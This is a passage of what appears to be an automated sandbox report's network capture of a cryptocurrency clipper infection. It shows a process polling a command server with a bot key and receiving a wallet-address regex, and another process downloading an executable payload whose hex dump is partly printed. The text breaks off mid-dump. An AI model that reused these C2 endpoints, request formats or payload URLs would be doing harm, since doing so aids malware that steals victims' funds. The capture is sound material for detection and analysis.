Nov 7, 2022 23:48:47.549798965 CET	126	OUT	Data Raw: 6d 44 01 90 a1 e2 9f 15 00 99 58 a7 60 38 84 85 ed 22 c6 0f e5 ad 04 40 2d 9b ad 4f c4 da e1 7a fe 20 e3 bf 95 75 20 00 2a 7c 3d b2 34 d7 1f 0b 2f 4f 05 0b 5f 02 db b3 a7 81 ee 31 04 16 57 e8 1b 4e e1 6d ba 09 b3 14 00 53 c0 d6 a2 e0 79 cb 7f 8e Data Ascii: mDX`8"@-Oz u *\|=4/O_1WNmSyvW%$y$XCL=ua`a)<S.8'vCd_wUpOEG~<7q&>%oETG(PW7%V/`5_{v\|X~x"
Nov 7, 2022 23:48:47.549885035 CET	139	OUT	Data Raw: 4d fc 3e 1b 7e 24 e4 29 ef f8 82 db f0 92 6f 04 ee f9 ea b3 07 08 80 a9 bb fc 02 30 1a 88 a3 8b 7f 16 34 34 3c 89 f1 2b 6d 82 06 b7 15 00 3d 41 00 94 5f fb c5 db 7f 3f 3d ca 73 64 f5 7a e9 7b 2a 01 f0 4b fb d4 02 60 f5 3d 80 95 00 58 fd 10 48 25 Data Ascii: M>~$)o044<+m=A_?=sdz{K`=XH%+(1$oxTji? >\|%n_AK$.hYZL01OOPqSzJcHu Gc}hL]oFyd=A0t\|bAh
Nov 7, 2022 23:48:47.549937010 CET	149	OUT	Data Raw: 04 68 3d 68 d9 7e 0b 62 a4 47 45 c8 a4 ee be 1f 65 cc 09 49 5f f7 f5 27 e9 3f d3 d7 51 ea a9 a2 97 84 b9 fd dd 6a b4 6d eb 74 ef d8 92 2e 8e 37 89 2b b7 26 45 50 f6 75 d4 ba c7 36 90 76 81 83 7b dc c0 81 0d db f9 76 15 44 ec 92 b1 a4 62 a4 e4 25 Data Ascii: h=h~bGEeI_'?Qjmt.7+&EPu6v{vDb%}nFzwe!l~^m;mV~7^{.0A<1,^8&"{"9"sI:!pf}{U7R%m8
Nov 7, 2022 23:48:47.579229116 CET	152	OUT	Data Raw: ac 9f 82 61 fa 90 8b 6f dd 23 30 66 d6 23 78 28 37 73 67 08 76 4e 75 91 08 13 0c 49 b7 d5 4d 7e 68 21 a5 4d 00 6c c0 44 97 16 50 c4 09 42 8e 15 d8 14 15 8e 98 1f 02 02 13 a5 34 7c 31 4f f2 e9 d6 02 db 2c 68 08 76 06 16 07 61 71 12 58 9d 16 07 15 Data Ascii: ao#0f#x(7sgvNuIM~h!MlDPB4\|1O,hvaqX!qmaW[`qk]zt#{<hlwMXaqbW(7Vx)_4m_wE!}Qk?bSF^e_?-,iC
Nov 7, 2022 23:48:47.579318047 CET	165	OUT	Data Raw: b8 80 f4 35 77 f3 e9 a0 51 8a a2 97 7c 56 a1 45 cb 4b 45 c9 3c 6c 1c 20 49 de 0b 0c 2b fb 18 b0 bc e6 8b 1d d3 23 c3 e6 d1 22 51 50 4e 2b 44 55 22 54 bd a6 30 d0 4f 0f bc 16 f4 d3 b0 6d e1 2d 18 87 c1 e2 24 a8 90 36 94 66 9a 28 c0 cd 03 2b d2 cd Data Ascii: 5wQ\|VEKE<l I+#"QPN+DU"T0Om-$6f(+ xXBT*`f4zY#,EOuzr]':ow/"Wy>[R2ae'a6Ent>$y=qlOhCuC-1/ge
Nov 7, 2022 23:48:47.579345942 CET	167	OUT	Data Raw: 8c 09 7f 69 60 61 00 5b 5e 16 a6 85 ea 87 46 fe 32 f4 55 e8 af 50 67 5f ce fb f8 fa f8 b9 29 8f f1 27 22 60 e1 1a c7 d6 48 84 c5 49 49 ed a3 00 fe e3 b3 0b 62 b3 21 c1 7e ab 69 f8 ef 96 ee 75 6c 2f 1c 0d 6a 9f 79 d8 5e 8f 6e 1d 58 fb 99 81 a2 1f Data Ascii: i`a[^F2UPg_)'"`HIIb!~iul/jy^nXRy2f9>syjCuXuQ(u\|gw0(E=h}g\|sFpgWsWYok"xM^=# t4\x
Nov 7, 2022 23:48:49.682095051 CET	982	IN	Data Raw: 06 6a 32 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 33 52 65 73 70 6f 6e 73 65 0b 49 64 33 52 65 73 70 6f 6e 73 65 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 35 44 12 ad 4c 87 97 7c ce 92 a7 Data Ascii: j2%http://tempuri.org/Entity/Id3ResponseId3ResponseVsaVD5DL\|MVEIDVB7
Nov 7, 2022 23:48:49.910602093 CET	984	IN	Data Raw: 06 93 04 74 26 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 33 52 65 73 70 6f 6e 73 65 0c 49 64 32 33 52 65 73 70 6f 6e 73 65 0a 49 64 32 33 52 65 73 75 6c 74 07 45 6e 74 69 74 79 36 07 43 75 72 72 65 6e Data Ascii: t&http://tempuri.org/Entity/Id23ResponseId23ResponseId23ResultEntity6CurrentFilternilFinalPointStatusVisibleVsaVD9D3IY^wGk4DVB;B=biE?EAECEEGEEE#Chttps://ezisc.com/ofg7dfg312.wretg\|%l
Nov 7, 2022 23:49:11.576939106 CET	15279	IN	Data Raw: 06 6c 34 26 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 34 52 65 73 70 6f 6e 73 65 0c 49 64 32 34 52 65 73 70 6f 6e 73 65 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 4d 44 12 ad 69 32 a7 75 c5 Data Ascii: l4&http://tempuri.org/Entity/Id24ResponseId24ResponseVsaVDMDi2uID-DVBO

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49725	45.159.189.115	80	C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2022 23:49:09.982690096 CET	11685	OUT	GET /bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 7, 2022 23:49:10.018937111 CET	11685	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Nov 2022 22:49:10 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 7, 2022 23:49:10.088362932 CET	12610	OUT	GET /bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 7, 2022 23:49:10.125140905 CET	13052	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Nov 2022 22:49:10 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 803 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 33 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 62 63 31 71 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 34 2c 35 39 7d 29 7c 28 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 7b 31 7d 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 32 34 2c 33 34 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 2c 34 34 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 29 24 Data Ascii: ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59})\|(3[a-zA-HJ-NP-Z0-9]{25,59})\|(bc1q[a-zA-HJ-NP-Z0-9]{24,59})\|(1[a-km-zA-HJ-NP-Z1-9]{25,34})\|(3[a-km-zA-HJ-NP-Z1-9]{25,34})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{26,33})\|(M[a-km-zA-HJ-NP-Z1-9]{26,33})\|(3[a-km-zA-HJ-NP-Z1-9]{26,33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33})\|(0x[a-fA-F0-9]{40})\|(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{24,34})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|([1-9A-HJ-NP-Za-km-z]{32,44})\|([A-Z2-7]{58})\|(R[a-zA-Z0-9]{33}))$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49730	45.159.189.115	80	C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2022 23:50:16.481925964 CET	15310	OUT	GET /bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 7, 2022 23:50:16.515762091 CET	15310	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Nov 2022 22:50:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: keep-alive Data Raw: 6f 6b Data Ascii: ok
Nov 7, 2022 23:50:16.516701937 CET	15310	OUT	GET /bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1 Host: clipper.guru User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Nov 7, 2022 23:50:16.551136017 CET	15311	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Nov 2022 22:50:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 803 Connection: keep-alive Data Raw: 5e 28 3f 3a 28 31 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 33 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 35 2c 35 39 7d 29 7c 28 62 63 31 71 5b 61 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 30 2d 39 5d 7b 32 34 2c 35 39 7d 29 7c 28 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 35 2c 33 34 7d 29 7c 28 71 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 70 5b 61 2d 7a 30 2d 39 5d 7b 34 31 7d 29 7c 28 4c 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 4d 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 33 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 6c 74 63 31 71 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 32 36 2c 33 33 7d 29 7c 28 30 78 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 44 7b 31 7d 5b 35 2d 39 41 2d 48 4a 2d 4e 50 2d 55 5d 7b 31 7d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 7d 29 7c 28 34 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 38 5b 30 2d 39 41 42 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 39 33 7d 29 7c 28 72 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 7b 32 34 2c 33 34 7d 29 7c 28 74 31 5b 61 2d 6b 6d 2d 7a 41 2d 48 4a 2d 4e 50 2d 5a 31 2d 39 5d 7b 33 33 7d 29 7c 28 58 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 72 6f 6e 69 6e 3a 5b 61 2d 66 41 2d 46 30 2d 39 5d 7b 34 30 7d 29 7c 28 54 5b 41 2d 5a 61 2d 7a 31 2d 39 5d 7b 33 33 7d 29 7c 28 68 74 74 70 5b 73 5d 2a 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 74 72 61 64 65 6f 66 66 65 72 5c 2f 6e 65 77 5c 2f 5c 3f 70 61 72 74 6e 65 72 3d 28 5b 30 2d 39 5d 2b 29 26 74 6f 6b 65 6e 3d 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2b 29 29 7c 28 74 7a 5b 31 2d 33 5d 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 33 7d 29 7c 28 61 64 64 72 31 5b 61 2d 7a 30 2d 39 5d 2b 29 7c 28 63 6f 73 6d 6f 73 31 5b 61 2d 7a 30 2d 39 5d 7b 33 38 7d 29 7c 28 5b 31 2d 39 41 2d 48 4a 2d 4e 50 2d 5a 61 2d 6b 6d 2d 7a 5d 7b 33 32 2c 34 34 7d 29 7c 28 5b 41 2d 5a 32 2d 37 5d 7b 35 38 7d 29 7c 28 52 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 33 33 7d 29 29 24 Data Ascii: ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59})\|(3[a-zA-HJ-NP-Z0-9]{25,59})\|(bc1q[a-zA-HJ-NP-Z0-9]{24,59})\|(1[a-km-zA-HJ-NP-Z1-9]{25,34})\|(3[a-km-zA-HJ-NP-Z1-9]{25,34})\|(q[a-z0-9]{41})\|(p[a-z0-9]{41})\|(L[a-km-zA-HJ-NP-Z1-9]{26,33})\|(M[a-km-zA-HJ-NP-Z1-9]{26,33})\|(3[a-km-zA-HJ-NP-Z1-9]{26,33})\|(ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33})\|(0x[a-fA-F0-9]{40})\|(D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})\|(4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})\|(r[0-9a-zA-Z]{24,34})\|(t1[a-km-zA-HJ-NP-Z1-9]{33})\|(X[1-9A-HJ-NP-Za-km-z]{33})\|(ronin:[a-fA-F0-9]{40})\|(T[A-Za-z1-9]{33})\|(http[s]*:\/\/steamcommunity.com\/tradeoffer\/new\/\?partner=([0-9]+)&token=([a-zA-Z0-9]+))\|(tz[1-3][1-9A-HJ-NP-Za-km-z]{33})\|(addr1[a-z0-9]+)\|(cosmos1[a-z0-9]{38})\|([1-9A-HJ-NP-Za-km-z]{32,44})\|([A-Z2-7]{58})\|(R[a-zA-Z0-9]{33}))$

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49713	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-07 22:48:50 UTC	0	OUT	GET /ofg7dfg312.wretg HTTP/1.1 Host: ezisc.com Connection: Keep-Alive
2022-11-07 22:48:51 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Nov 2022 22:48:51 GMT Content-Length: 5021696 Connection: close X-Content-Type-Options: nosniff Last-Modified: Mon, 07 Nov 2022 11:02:31 GMT ETag: "4ca000-5ecdf5c2a9230" X-Httpd-Modphp: 1 X-XSS-Protection: 1; mode=block Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT Accept-Ranges: bytes
2022-11-07 22:48:51 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 00 00 00 00 00 9e 4c 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 98 26 00 00 04 04 00 00 00 00 00 80 bd 06 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 50 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdL"&@`P`
2022-11-07 22:48:51 UTC	16	IN	Data Raw: 89 8b d8 00 00 00 48 8b 48 30 0f 10 81 c0 02 00 00 0f 11 44 24 18 0f 10 81 d0 02 00 00 0f 11 44 24 28 0f 10 81 e0 02 00 00 0f 11 44 24 38 48 8b 48 70 48 89 4c 24 48 48 8b 50 78 48 89 54 24 10 e8 48 08 06 00 48 8b 44 24 50 48 8b 48 30 c6 81 e8 00 00 00 00 48 8b 48 30 31 d2 87 91 28 03 00 00 48 8b 4c 24 68 48 89 0c 24 0f 1f 00 e8 bb 00 00 00 48 8b 44 24 50 48 8b 48 30 48 89 0c 24 e8 69 16 03 00 48 8b 44 24 50 48 8b 48 30 c6 81 e8 00 00 00 01 48 8b 4c 24 10 48 89 0c 24 48 8b 4c 24 48 48 89 4c 24 08 e8 61 e1 03 00 48 8b 44 24 50 48 8b 40 30 0f 10 44 24 18 0f 11 80 c0 02 00 00 0f 10 44 24 28 0f 11 80 d0 02 00 00 0f 10 44 24 38 0f 11 80 e0 02 00 00 48 8b 6c 24 58 48 83 c4 60 c3 e8 85 58 03 00 48 8d 05 71 56 2e 00 48 89 04 24 48 c7 44 24 08 1e 00 00 00 e8 ac 62 Data Ascii: HH0D$D$(D$8HHpHL$HHPxHT$HHD$PHH0HH01(HL$hH$HD$PHH0H$iHD$PHH0HL$H$HL$HHL$aHD$PH@0D$D$(D$8Hl$XH`XHqV.H$HD$b
2022-11-07 22:48:52 UTC	32	IN	Data Raw: 39 d2 0f 86 21 01 00 00 4c 89 54 24 60 44 0f b6 5c 18 01 41 80 fb 78 74 6c 41 80 fb 79 74 0b 4c 89 d0 49 89 cb e9 27 ff ff ff 4c 89 0c 24 48 89 4c 24 08 48 89 7c 24 10 48 8b 84 24 f0 00 00 00 48 89 44 24 18 c6 44 24 20 01 0f 1f 00 e8 bb fb ff ff 4c 8b 4c 24 28 48 8b 4c 24 30 48 8b 7c 24 38 48 8b 54 24 50 48 8b 9c 24 d0 00 00 00 0f b6 b4 24 f8 00 00 00 4c 8b 84 24 e8 00 00 00 4c 8b 54 24 60 eb 9a 4c 89 0c 24 48 89 4c 24 08 48 89 7c 24 10 4c 89 44 24 18 40 88 74 24 20 e8 6b fb ff ff 4c 8b 4c 24 28 48 8b 4c 24 30 48 8b 7c 24 38 48 8b 54 24 50 48 8b 9c 24 d0 00 00 00 0f b6 b4 24 f8 00 00 00 4c 8b 84 24 e8 00 00 00 4c 8b 54 24 60 e9 47 ff ff ff 48 c7 04 24 00 00 00 00 4c 89 4c 24 08 48 89 4c 24 10 0f 1f 00 e8 7b 7c 04 00 48 8b 44 24 18 48 8b 4c 24 20 48 89 84 Data Ascii: 9!LT$`D\AxtlAytLI'L$HL$H\|$H$HD$D$ LL$(HL$0H\|$8HT$PH$$L$LT$`L$HL$H\|$LD$@t$ kLL$(HL$0H\|$8HT$PH$$L$LT$`GH$LL$HL${\|HD$HL$ H
2022-11-07 22:48:52 UTC	48	IN	Data Raw: f2 49 00 48 39 c8 73 5f 48 c1 e0 04 48 8b 0c 02 48 8b 44 02 08 48 89 4c 24 28 48 89 44 24 30 48 8b 6c 24 10 48 83 c4 18 c3 48 8d 05 12 45 2d 00 48 89 44 24 28 48 c7 44 24 30 04 00 00 00 48 8b 6c 24 10 48 83 c4 18 c3 48 8d 05 e4 4d 2d 00 48 89 44 24 28 48 c7 44 24 30 07 00 00 00 48 8b 6c 24 10 48 83 c4 18 c3 e8 01 e3 05 00 90 48 83 ec 10 48 89 6c 24 08 48 8d 6c 24 08 48 8b 44 24 18 48 89 04 24 e8 e4 f5 ff ff 48 8b 6c 24 08 48 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 10 48 89 6c 24 08 48 8d 6c 24 08 48 8b 44 24 18 48 89 04 24 e8 04 f8 ff ff 48 8b 6c 24 08 48 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b Data Ascii: IH9s_HHHDHL$(HD$0Hl$HHE-HD$(HD$0Hl$HHM-HD$(HD$0Hl$HHHl$Hl$HD$H$Hl$HHHl$Hl$HD$H$Hl$HeH%(HH;
2022-11-07 22:48:52 UTC	64	IN	Data Raw: 08 e8 c7 a9 05 00 eb d9 31 db 0f 1f 00 e8 fb 9f 05 00 e9 97 fe ff ff 48 8b 5a 30 48 83 7b 08 00 0f 84 88 fe ff ff 48 8b 03 48 8b 4c 24 38 48 89 0c 24 48 89 44 24 08 e8 51 4f 00 00 48 8b 54 24 60 e9 68 fe ff ff 49 89 c8 0f 1f 40 00 e9 e4 fd ff ff 0f b7 7b 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 0f 84 7c fd ff ff 48 89 4c 24 40 31 ff e9 57 fd ff ff 48 89 44 24 28 48 89 4c 24 30 48 8b 44 24 60 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 35 0b 00 00 48 8b 44 24 28 48 8b 4c 24 30 48 8b 54 24 68 e9 ea fc ff ff 48 8b 44 24 60 8b 48 54 0f ba e1 04 72 0a 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 50 48 48 8b 44 24 70 48 89 04 24 48 c7 44 24 08 00 00 00 00 48 8b 02 ff d0 eb d9 48 8d 05 40 59 2d 00 48 89 04 24 48 c7 44 24 08 15 00 00 00 e8 73 80 02 00 48 89 c8 b9 08 Data Ascii: 1HZ0H{HHL$8H$HD$QOHT$`hI@{RH<HHH\|HL$@1WHD$(HL$0HD$`H$HT$HL$5HD$(HL$0HT$hHD$`HTrHl$PHXHPHHD$pH$HD$HH@Y-H$HD$sH
2022-11-07 22:48:52 UTC	80	IN	Data Raw: d0 0f 84 cb 01 00 00 66 0f 1f 44 00 00 41 80 fa 01 77 09 48 85 c9 0f 84 a9 01 00 00 45 84 d2 75 c2 48 83 7e 18 00 0f 85 91 01 00 00 4c 8b 0e 49 ff c1 44 0f b6 56 09 49 83 f9 08 0f 8e 71 01 00 00 49 89 cb 44 89 d1 41 bc 01 00 00 00 49 d3 e4 49 d1 ec 4f 8d 2c 64 4f 8d 24 ac 4d 39 e1 76 7b 48 89 14 24 48 89 74 24 08 0f 1f 40 00 e8 1b c9 ff ff 48 8b 44 24 68 48 8b 4c 24 70 48 8b 54 24 30 48 89 d0 48 8b 54 24 68 0f b6 59 09 48 89 ce 89 d9 41 b8 01 00 00 00 49 d3 e0 49 8d 58 ff 48 21 c3 48 83 7e 18 00 66 0f 1f 44 00 00 0f 85 f5 01 00 00 44 0f b7 42 52 49 0f af d8 48 03 5e 10 49 89 c0 48 c1 e8 38 3c 05 73 03 83 c0 05 88 44 24 27 31 c9 31 ff e9 b8 01 00 00 44 0f b7 4e 0a 80 f9 0f 76 05 b9 0f 00 00 00 83 e1 0f 41 ba 01 00 00 00 41 d3 e2 66 45 39 ca 0f 86 60 ff ff Data Ascii: fDAwHEuH~LIDVIqIDAIIO,dO$M9v{H$Ht$@HD$hHL$pHT$0HHT$hYHAIIXH!H~fDDBRIH^IH8<sD$'11DNvAAfE9`
2022-11-07 22:48:52 UTC	96	IN	Data Raw: c7 44 24 18 01 00 00 00 0f 1f 44 00 00 e8 db f8 ff ff 48 8b 44 24 28 48 89 44 24 50 48 8b 6c 24 30 48 83 c4 38 c3 e8 42 02 05 00 66 90 e9 3b ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 9f 00 00 00 48 83 ec 30 48 89 6c 24 28 48 8d 6c 24 28 48 c7 44 24 10 00 00 00 00 0f 57 c0 0f 11 44 24 18 48 8d 05 40 76 04 00 48 89 44 24 18 48 8d 44 24 10 48 89 44 24 20 48 8d 44 24 18 48 89 04 24 e8 63 00 05 00 31 c0 90 eb 1e 48 8b 4c 24 10 84 01 48 8d 15 30 0e 4d 00 48 89 54 c1 28 48 ff c0 0f 1f 84 00 00 00 00 00 48 3d 86 00 00 00 7c da 48 8b 05 a9 b9 45 00 48 89 04 24 e8 48 5f ff ff 48 8b 44 24 10 48 63 4c 24 08 48 89 08 48 8b 44 24 10 48 89 44 